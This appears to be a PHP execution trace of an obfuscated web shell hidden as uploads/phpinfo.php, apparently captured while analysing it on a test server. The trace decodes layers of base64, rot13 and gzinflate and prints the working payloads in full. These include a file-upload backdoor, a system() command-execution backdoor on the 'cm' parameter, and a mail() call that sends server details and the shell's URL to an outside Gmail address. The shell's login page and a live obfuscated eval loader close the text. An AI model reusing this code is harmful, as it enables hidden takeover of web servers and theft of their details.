5 32 0 0.028130 1378608 str_rot13 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 24 1 'H�DX�0\024���\027�C�\nα�R�a{�*��D�Хӑ�)\t&��a��qB��~�{��&i��e\022\025/�wP��c�q\033Ǹ�\006gp8(3һ�\035l{�K�+\017���zm�K���S\036�A����OHe�3�IVR�\032vl�\022�1[�Moq;�4N�|�Tˋ��>m+�J�\016�M��04<�\026�n%�Q�\030)��=_�\023$\000y��UyU�R��ANv��-�w焒&���1K��c��\'c��\024&�4������zѧ�3�ҋ�t��i<K���l�\024Y����!�-ަB�6_0���y����$8�c�\001'
5 32 1 0.028168 1378960
5 32 R 'U�QK�0\024���\027�P�\nα�E�n{�*��Q�Хӑ�)\t&��n��dO��~�{��&v��r\022\025/�jC��p�d\033Ǹ�\006tc8(3һ�\035y{�X�+\017���mz�X���F\036�N����BUr�3�VIE�\032iy�\022�1[�Zbd;�4A�|�Gˋ��>z+�W�\016�Z��04<�\026�a%�D�\030)��=_�\023$\000l��HlH�E��NAi��-�j焒&���1X��p��\'p��\024&�4������mѧ�3�ҋ�g��v<X���y�\024L����!�-ަO�6_0���l����$8�p�\001'
5 33 0 0.028212 1378480 gzinflate 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 24 1 'U�QK�0\024���\027�P�\nα�E�n{�*��Q�Хӑ�)\t&��n��dO��~�{��&v��r\022\025/�jC��p�d\033Ǹ�\006tc8(3һ�\035y{�X�+\017���mz�X���F\036�N����BUr�3�VIE�\032iy�\022�1[�Zbd;�4A�|�Gˋ��>z+�W�\016�Z��04<�\026�a%�D�\030)��=_�\023$\000l��HlH�E��NAi��-�j焒&���1X��p��\'p��\024&�4������mѧ�3�ҋ�g��v<X���y�\024L����!�-ަO�6_0���l����$8�p�\001'
5 33 1 0.028260 1378960
5 33 R 'vs(vffrg($_TRG["ynjyk"])) \t{ rpub \'<ugzy><obql><sbez zrgubq=CBFG rapglcr="zhygvcneg/sbez-qngn" npgvba=""><vachg glcr="svyr" anzr="ynjyk"><vachg glcr=fhozvg inyhr="Hc"></sbez></obql></ugzy>\';$ynjyk = @$_SVYRF["ynjyk"]; vs ($ynjyk["anzr"] != \'\') { $shyycngu = $_ERDHRFG["cngu"] . $ynjyk["anzr"]; vs (zbir_hcybnqrq_svyr($ynjyk[\'gzc_anzr\'], $shyycngu)) { rpub "<u1><n uers=\'$shyycngu\'>BX-Pyvpx urer!</n></u1>"; }} }'
5 34 0 0.028291 1378608 str_rot13 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 24 1 'vs(vffrg($_TRG["ynjyk"])) \t{ rpub \'<ugzy><obql><sbez zrgubq=CBFG rapglcr="zhygvcneg/sbez-qngn" npgvba=""><vachg glcr="svyr" anzr="ynjyk"><vachg glcr=fhozvg inyhr="Hc"></sbez></obql></ugzy>\';$ynjyk = @$_SVYRF["ynjyk"]; vs ($ynjyk["anzr"] != \'\') { $shyycngu = $_ERDHRFG["cngu"] . $ynjyk["anzr"]; vs (zbir_hcybnqrq_svyr($ynjyk[\'gzc_anzr\'], $shyycngu)) { rpub "<u1><n uers=\'$shyycngu\'>BX-Pyvpx urer!</n></u1>"; }} }'
5 34 1 0.028318 1379088
5 34 R 'if(isset($_GET["lawlx"])) \t{ echo \'<html><body><form method=POST enctype="multipart/form-data" action=""><input type="file" name="lawlx"><input type=submit value="Up"></form></body></html>\';$lawlx = @$_FILES["lawlx"]; if ($lawlx["name"] != \'\') { $fullpath = $_REQUEST["path"] . $lawlx["name"]; if (move_uploaded_file($lawlx[\'tmp_name\'], $fullpath)) { echo "<h1><a href=\'$fullpath\'>OK-Click here!</a></h1>"; }} }'
5 35 0 0.028377 1381344 eval 1 'if(isset($_GET["lawlx"])) \t{ echo \'<html><body><form method=POST enctype="multipart/form-data" action=""><input type="file" name="lawlx"><input type=submit value="Up"></form></body></html>\';$lawlx = @$_FILES["lawlx"]; if ($lawlx["name"] != \'\') { $fullpath = $_REQUEST["path"] . $lawlx["name"]; if (move_uploaded_file($lawlx[\'tmp_name\'], $fullpath)) { echo "<h1><a href=\'$fullpath\'>OK-Click here!</a></h1>"; }} }' /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 24 0
5 35 1 0.028407 1381344
4 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 25 $xd = 'fZFieMIwEIffD/YdjkVjA6lwr1HZn6Y02faizJYKaY4SJVNkcfYwoemnt7XIQEpf5bi75+H4BVyNW2sCVKtdieJuOHx83UrKS2K3qJzx7Q24v3dyWtnsJIs1L9rmtjg2jFIIlNQwAgc8Y2Yah+9k+NWbkM+3LPZMHhLCbd/1zJmLOT/BXg1GFBsUEBWV4Rd8++bRJJv6SmSyUaGk4XugPyuJSJeJkoR9UW7cIdN1LcwML3heWLkcDQb/d/woeBV/kyAN6m2WZ5iNxIubRcaCPCX0PJkm+LvmVPqn2PuN534ML88H'
5 36 0 0.028437 1378768 base64_decode 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 26 1 'fZFieMIwEIffD/YdjkVjA6lwr1HZn6Y02faizJYKaY4SJVNkcfYwoemnt7XIQEpf5bi75+H4BVyNW2sCVKtdieJuOHx83UrKS2K3qJzx7Q24v3dyWtnsJIs1L9rmtjg2jFIIlNQwAgc8Y2Yah+9k+NWbkM+3LPZMHhLCbd/1zJmLOT/BXg1GFBsUEBWV4Rd8++bRJJv6SmSyUaGk4XugPyuJSJeJkoR9UW7cIdN1LcwML3heWLkcDQb/d/woeBV/kyAN6m2WZ5iNxIubRcaCPCX0PJkm+LvmVPqn2PuN534ML88H'
5 36 1 0.028461 1379184
5 36 R '}�bx�0\020��\017�\035�Ec\003�p�Qٟ�4��̖\ni�\022%Sdq�0�駷��@J_帻��\005\\�[k\002T�]��n8||�J�Kb�����\r��wrZ��$�5/��86�R\b��0\002\a<cf\032��d�՛�Ϸ,�L\036\022�m�̙�9?�^\rF\024\033\024\020\025��\027|���$��Jd�Q���{�?+�H����}Qn�!�u-�\f/x^X�\034\r\006�w�(x\025� \r�m�g��ċ�EƂ<%�<�&���T�����~\f/�\a'
5 37 0 0.028501 1379152 str_rot13 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 26 1 '}�bx�0\020��\017�\035�Ec\003�p�Qٟ�4��̖\ni�\022%Sdq�0�駷��@J_帻��\005\\�[k\002T�]��n8||�J�Kb�����\r��wrZ��$�5/��86�R\b��0\002\a<cf\032��d�՛�Ϸ,�L\036\022�m�̙�9?�^\rF\024\033\024\020\025��\027|���$��Jd�Q���{�?+�H����}Qn�!�u-�\f/x^X�\034\r\006�w�(x\025� \r�m�g��ċ�EƂ<%�<�&���T�����~\f/�\a'
5 37 1 0.028537 1379440
5 37 R '}�ok�0\020��\017�\035�Rp\003�c�Dٟ�4��̖\nv�\022%Fqd�0�駷��@W_帻��\005\\�[x\002G�]��a8||�W�Xo�����\r��jeM��$�5/��86�E\b��0\002\a<ps\032��q�՛�Ϸ,�Y\036\022�z�̙�9?�^\rS\024\033\024\020\025��\027|���$��Wq�D���{�?+�U����}Da�!�h-�\f/k^K�\034\r\006�j�(k\025� \r�z�t��ċ�RƂ<%�<�&���G�����~\f/�\a'
5 38 0 0.028576 1379024 gzinflate 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 26 1 '}�ok�0\020��\017�\035�Rp\003�c�Dٟ�4��̖\nv�\022%Fqd�0�駷��@W_帻��\005\\�[x\002G�]��a8||�W�Xo�����\r��jeM��$�5/��86�E\b��0\002\a<ps\032��q�՛�Ϸ,�Y\036\022�z�̙�9?�^\rS\024\033\024\020\025��\027|���$��Wq�D���{�?+�U����}Da�!�h-�\f/k^K�\034\r\006�j�(k\025� \r�z�t��ċ�RƂ<%�<�&���G�����~\f/�\a'
5 38 1 0.028643 1379568
5 38 R ' $urk = "unpxre0882@tznvy.pbz";\r\n $onfyvx = "Sbhaq";\r\n $kq = "Svyr Cngu : " . $_FREIRE[\'QBPHZRAG_EBBG\'] . "\\e\\a";\r\n $kq.= "Freire Nqzva : " . $_FREIRE[\'FREIRE_NQZVA\'] . "\\e\\a";\r\n $kq.= "Freire Bcrengvat Flfgrz : " . $_FREIRE[\'FREIRE_FBSGJNER\'] . "\\e\\a";\r\n $kq.= "Furyy Yvax : uggc://" . $_FREIRE[\'FREIRE_ANZR\'] . $_FREIRE[\'CUC_FRYS\'] . "\\e\\a";\r\n $kq.= "Fvgr : " . $_FREIRE[\'UGGC_UBFG\'] . "\\e\\a";\r\n znvy($urk, $onfyvx, $kq); ?>'
5 39 0 0.028676 1379280 str_rot13 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 26 1 ' $urk = "unpxre0882@tznvy.pbz";\r\n $onfyvx = "Sbhaq";\r\n $kq = "Svyr Cngu : " . $_FREIRE[\'QBPHZRAG_EBBG\'] . "\\e\\a";\r\n $kq.= "Freire Nqzva : " . $_FREIRE[\'FREIRE_NQZVA\'] . "\\e\\a";\r\n $kq.= "Freire Bcrengvat Flfgrz : " . $_FREIRE[\'FREIRE_FBSGJNER\'] . "\\e\\a";\r\n $kq.= "Furyy Yvax : uggc://" . $_FREIRE[\'FREIRE_ANZR\'] . $_FREIRE[\'CUC_FRYS\'] . "\\e\\a";\r\n $kq.= "Fvgr : " . $_FREIRE[\'UGGC_UBFG\'] . "\\e\\a";\r\n znvy($urk, $onfyvx, $kq); ?>'
5 39 1 0.028702 1379824
5 39 R ' $hex = "hacker0882@gmail.com";\r\n $baslik = "Found";\r\n $xd = "File Path : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\\r\\n";\r\n $xd.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\\r\\n";\r\n $xd.= "Server Operating System : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\\r\\n";\r\n $xd.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\\r\\n";\r\n $xd.= "Site : " . $_SERVER[\'HTTP_HOST\'] . "\\r\\n";\r\n mail($hex, $baslik, $xd); ?>'
5 40 0 0.028754 1382272 eval 1 ' $hex = "hacker0882@gmail.com";\r\n $baslik = "Found";\r\n $xd = "File Path : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\\r\\n";\r\n $xd.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\\r\\n";\r\n $xd.= "Server Operating System : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\\r\\n";\r\n $xd.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\\r\\n";\r\n $xd.= "Site : " . $_SERVER[\'HTTP_HOST\'] . "\\r\\n";\r\n mail($hex, $baslik, $xd); ?>' /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 26 0
5 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code(26) : eval()'d code 1 $hex = 'hacker0882@gmail.com'
5 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code(26) : eval()'d code 2 $baslik = 'Found'
5 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code(26) : eval()'d code 3 $xd = 'File Path : /var/www/html\r\n'
5 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code(26) : eval()'d code 4 $xd .= 'Server Admin : webmaster@localhost\r\n'
5 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code(26) : eval()'d code 5 $xd .= 'Server Operating System : Apache/2.4.52 (Ubuntu)\r\n'
5 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code(26) : eval()'d code 6 $xd .= 'Shell Link : http://localhost/uploads/phpinfo.php\r\n'
5 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code(26) : eval()'d code 7 $xd .= 'Site : localhost\r\n'
6 41 0 0.028877 1382496 mail 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code(26) : eval()'d code 8 3 'hacker0882@gmail.com' 'Found' 'File Path : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer Operating System : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/phpinfo.php\r\nSite : localhost\r\n'
6 41 1 0.029861 1382592
6 41 R FALSE
5 40 1 0.029889 1382496
4 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 27 $configs = 'KytJ0ChYWCtX10OJag1l8QhlZo9JL6hFj9XUR6jm5UUAgqKC0iQFJZvk1CI7JXiIkFdOlYKtAoYWqHlNQU1tRJUGQxFZBHeEPrIZhXJSQEmtgr0dAA=='
5 42 0 0.029921 1379328 base64_decode 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 28 1 'KytJ0ChYWCtX10OJag1l8QhlZo9JL6hFj9XUR6jm5UUAgqKC0iQFJZvk1CI7JXiIkFdOlYKtAoYWqHlNQU1tRJUGQxFZBHeEPrIZhXJSQEmtgr0dAA=='
5 42 1 0.029942 1379520
5 42 R '++I�(XX+W�C�j\re�\bef�I/�E���G���E\000����$\005%���";%x��WN���\002�\026�yMAMmD�\006C\021Y\004w�>�\031�rR@I���\035\000'
5 43 0 0.029969 1379488 str_rot13 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 28 1 '++I�(XX+W�C�j\re�\bef�I/�E���G���E\000����$\005%���";%x��WN���\002�\026�yMAMmD�\006C\021Y\004w�>�\031�rR@I���\035\000'
5 43 1 0.029994 1379632
5 43 R '++V�(KK+J�P�w\rr�\brs�V/�R���T���R\000����$\005%���";%k��JA���\002�\026�lZNZzQ�\006P\021L\004j�>�\031�eE@V���\035\000'
5 44 0 0.030018 1379440 gzinflate 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 28 1 '++V�(KK+J�P�w\rr�\brs�V/�R���T���R\000����$\005%���";%k��JA���\002�\026�lZNZzQ�\006P\021L\004j�>�\031�eE@V���\035\000'
5 44 1 0.030046 1379632
5 44 R 'vs (vffrg($_ERDHRFG[\'pz\'])) {\r\n rpub "<cer>";\r\n $pz = ($_ERDHRFG[\'pz\']);\r\n flfgrz($pz);\r\n rpub "</cer>";\r\n qvr;\r\n} ?>'
5 45 0 0.030067 1379488 str_rot13 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 28 1 'vs (vffrg($_ERDHRFG[\'pz\'])) {\r\n rpub "<cer>";\r\n $pz = ($_ERDHRFG[\'pz\']);\r\n flfgrz($pz);\r\n rpub "</cer>";\r\n qvr;\r\n} ?>'
5 45 1 0.030088 1379680
5 45 R 'if (isset($_REQUEST[\'cm\'])) {\r\n echo "<pre>";\r\n $cm = ($_REQUEST[\'cm\']);\r\n system($cm);\r\n echo "</pre>";\r\n die;\r\n} ?>'
5 46 0 0.030125 1380552 eval 1 'if (isset($_REQUEST[\'cm\'])) {\r\n echo "<pre>";\r\n $cm = ($_REQUEST[\'cm\']);\r\n system($cm);\r\n echo "</pre>";\r\n die;\r\n} ?>' /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 28 0
5 46 1 0.030154 1380552
5 47 0 0.030163 1379136 ini_set 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 31 2 'error_log' NULL
5 47 1 0.030180 1379208
5 47 R ''
5 48 0 0.030193 1379136 ini_set 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 32 2 'log_errors' 0
5 48 1 0.030208 1379208
5 48 R '0'
5 49 0 0.030222 1379136 ini_set 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 33 2 'max_execution_time' 0
5 49 1 0.030237 1379208
5 49 R '0'
5 50 0 0.030250 1379136 set_time_limit 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 34 1 0
5 50 1 0.030266 1379200
5 50 R FALSE
5 51 0 0.030279 1379168 version_compare 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 35 3 '7.2.34-37+ubuntu22.04.1+deb.sury.org+1' '5.3.0' '<'
5 51 1 0.030297 1379264
5 51 R FALSE
5 52 0 0.030310 1379168 define 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 38 2 'VERSION' 'Priv8 Shell'
5 52 1 0.030327 1379272
5 52 R TRUE
5 53 0 0.030340 1379200 get_magic_quotes_gpc 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 39 0
5 53 1 0.030353 1379200
5 53 R FALSE
5 54 0 0.030368 1379200 md5 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 50 1 'localhost'
5 54 1 0.030382 1379296
5 54 R '421aa90e079fa326b6494f812ad13e79'
5 55 0 0.030398 1379200 hardLogin 1 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 51 0
5 A /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 57 $userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
6 56 0 0.030432 1379200 implode 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 58 2 '|' [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
6 56 1 0.030454 1379344
6 56 R 'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler'
6 57 0 0.030471 1379280 preg_match 0 /var/www/html/uploads/phpinfo.php(3) : eval()'d code(1) : eval()'d code(2) : eval()'d code 58 2 '/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i' 'python-requests/2.25.1'
6 57 1 0.030491 1379344
6 57 R 0
0.030535 1299424
TRACE END [2023-02-12 23:43:40.141655]
<html><head></head><body><br><br><br>
<style>
body {background-color:#000000; color:#e1e1e1; margin:0; font:normal 75% Open Sans, sans-serif; background-image:url('https://i.imgur.com/hLcQCBx.gif'); } </style><pre align="center"><form method="post" style="color:#ffffff;text-align: center;"><img src="https://i.imgur.com/4Fq8k1E.png" align="center"><br><br><input type="password" name="pass" style="background-color:whitesmoke;border:1px solid #FFF;outline:none;" required=""><input type="submit" name="watching" value=">>" style="border:none;background-color:#1e252e;color:#fff;cursor:pointer; "></form></pre> </body></html>
<?pHp
$▛ = "99754106633f94d350db34d548d6091a";
$xD="ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNEhFeCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=="; $HEx="="; eval(htmlspecialchars_decode(urldecode(base64_decode($xD)))); exit; ?>